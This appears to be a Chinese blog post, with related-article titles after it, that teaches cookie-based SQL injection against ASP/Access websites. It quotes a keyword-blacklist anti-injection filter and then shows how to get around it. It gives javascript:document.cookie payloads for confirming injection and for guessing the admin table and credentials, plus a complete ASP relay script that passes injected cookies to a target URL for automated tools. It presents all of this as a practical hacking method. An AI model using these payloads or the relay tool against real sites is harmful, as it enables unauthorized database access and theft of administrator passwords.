最开始的判断access类型的网站注入点可以用“1 and 1=1”来判断。

不过现在的网站基本上被挡住了。之后呢,可以考虑cookie注入。

Dim Tc_Post,Tc_Get,Tc_In,Tc_Inf,Tc_Xh
'定义需要过滤的字串
Tc_In="'|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master||or|char|declare"
Tc_Inf = split(Tc_In,"|")
'处理post数据
If Request.Form<>"" Then
For Each Tc_Post In Request.Form
For Tc_Xh=0 To Ubound(Tc_Inf)
If Instr(LCase(Request.Form(Tc_Post)),Tc_Inf(Tc_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('请不要在参数中包含非法字符尝试注入!');</Script>"
'处理get数据
If Request.QueryString<>"" Then
For Each Tc_Get In Request.QueryString
For Tc_Xh=0 To Ubound(Tc_Inf)
If Instr(LCase(Request.QueryString(Tc_Get)),Tc_Inf(Tc_Xh))<>0 Then
Response.Write "<Script Language=JavaScript>alert('请不要在参数中包含非法字符尝试注入!');</Script>"
这 段代码把SQL注入中要用到的关键字基本都过滤了,但是作者忽略了一个重要的参数获取方式:cookie!程序只对get和post方式获取的参数进行了 过滤,要是通过cookie提交注入语句一样可以达到目的!因为防注代码的过滤,不能直接用get或者post方式进行注入。那如何进行突破呢?在说明之 前,先了解下request获取变量的方式:request.form获取的是post数据,request.querystring获取的get数 据,request.cookies获取的是cookie中的数据。但是如果是<%id=request("id")%>呢?这个时候程序是 按以下顺序来搜索集合:querystring,form,cookie,servervariable。当发现第一个匹配的变量的时候就认为是要访问的 成员。从上面的分析我们可以得到什么呢?这里既然程序就没有限制参数的来源,我们就不要去通过get的方式提交参数,而是在cookie里面加入参数id 的值,就可以饶过防注入代码的检测了!

1、判断注入
javascript:alert(document.cookie="id="+escape("1 and 1=1"));
例:
http://xxxx/view.asp?id=1
先访问http://xxxx/view.asp?id=1
接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("1 and 1=1"))
再访问http://xxxx/view.asp(未出错)
再输入:javascript:alert(document.cookie="id="+escape("188 and 1=2"))
再访问:http://xxxx/view.asp(出错)

2、猜解表段、字段
javascript:alert(document.cookie="id="+escape("1 and 1=(select count(*) from admin where len(username)>0)"));
剩下的事情就是重复上面的步骤来得到管理员帐户和密码了。

-----以下是工具----------
<%
cookname=request("jmdcw")
cookname=escape(cookname)
jmstr="id="&cookname   '存在注入的变量
jmstr=replace(jmstr,chr(32),"%20")
jmstr=replace(jmstr,chr(43),"%2b")

'//以下三行需要修改,Cookies值可以用Domain3.5浏览下就得到了~~
jmurl="http://zzz.com/cplb.asp" '存在注入的网址
jmref="http://zzz.com/index.asp" '来源地址
jmcok="ASPSESSI"

jmcok=jmcok& ";"&jmstr&";"
response.write postdata(jmurl,jmcok,jmref)
function postdata(posturl,postcok,postref)
dim http
set http=server.createobject("msxml2.serverxmlhttp")
with http
.open "POST",posturl,false
.setRequestheader "content-type","application/x-www-form-urlencoded"
.setrequestheader "referer",postref
.setrequestheader "cookie",postcok     '提交cookie值
.send()     '发送数据
postdata=.responsebody       '得到返回的二进制信息
end with
set http=nothing
postdata=bytes2BSTR(postdata) '转换二进制流
end function

function bytes2BSTR(vin)
dim strReturn
dim i,thischarcode,nextcharcode
strReturn=""
for i=1 to lenB(vin)
thischarcode=ascB(midB(vin,1,1))
if thischarcode<&H80 then
strReturn=strReturn&chr(thischarcode)
else
nextcharcode=ascB(midB(vin,1+1,1))
strReturn=strReturn&chr(clng(thischarcode) * &H100+cint(nextcharcode))
i=i+1
end if
next
bytes2BSTR=strReturn
end function
%>
保存为jmdcw.asp,最后可以本机装个IIS或绿色的aspsrv.exe,那么注入地址就是http://127.0.0.1/jmdcw.asp?jmdcw=46,直接用工具就OK了,从此HACKING的道路更宽广了

手工、工具分别实现cookie注入相关推荐

  1. 关于sql注入之cookie注入

    小知识:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后 ...

  2. (渗透-摘录) cookie 注入

    2019年2月11日  (渗透--摘录1) cookie注入 抛开中转工具直接搞定Cookie注入 最近在翻看危险漫步博客的时候,拜读了一篇关于Cookie注入的文章,受益良多.文中详细解析了Cook ...

  3. cookie注入分析和动画教程

    cookies的注入方法和原理 现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式 ...

  4. 【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入

    目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: A ...

  5. sqlmap指定cookie_利用SQLMap进行cookie注入

    SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工 ...

  6. 【渗透测试】cookie注入笔记

    目录 什么是cookie? 什么是cookie注入? Cookie手注流程 一.判断注入点 二.判断字段数 三.判断回显点 四.查询相关内容 补充 答疑 1.为什么是select 1,2 不是 sel ...

  7. Access数据库——Cookie注入

    目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...

  8. (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程

    目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...

  9. Cookie注入是怎样产生的

    Cookie注入是怎样产生的 现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~ ...

最新文章

  1. DHCP中继以及DHCP数据库的备份和还原
  2. 编写代码,实现一个栈(Stack)的类。
  3. CentOS6.5安装MySQL5.7详细教程
  4. c/c++面试试题(二)
  5. db2关闭下一句sql的日志_MySQL查询优化(3)-慢查询开启、日志分析
  6. 吴恩达深度学习 ——4.4 为什么使用深层表示
  7. error C2440: “<function-style-cast>”: 无法从“IplImage *”转换为“cv::Mat”
  8. git查看某次commit的修改
  9. 如何在你朋友面前伪装黑客6(程序代码)
  10. 渗透测试工程师可以写进简历的技能介绍部分
  11. Windows7安装蓝屏问题或Windows10ReadyBoost问题
  12. 定时任务:数据表设计与实现方案
  13. UNIX环境高级编程笔记(14)- 函数sigsuspend 实现父进程子进程同步
  14. 下拉框触发单击事件_谈谈如何给下拉框option添加点击事件?
  15. 现货白银价格走势分析
  16. Thinkphp5使用phpword生成图表
  17. VSPD软件发送与串口线发送区别
  18. 达梦数据库SQL学习
  19. BZOJ 4811([Ynoi2017]由乃的OJ-树链剖分)
  20. 思科Cisco交换机的基本命令

热门文章

  1. ITK:创建另一个图像实例
  2. ITK:将矢量图像投射为另一种类型
  3. DCMTK:OFOptional的单元测试
  4. VTK:PolyData之PointsProjectedHull
  5. VTK:几何对象之Sphere
  6. OpenCV霍夫直线houghlines点集的实例(附完整代码)
  7. Qt Creator启动调试器
  8. Qt Creator使用Clang代码模型解析C ++文件
  9. QT实现带有阴影的渲染3D场景
  10. QT的QStringView类的使用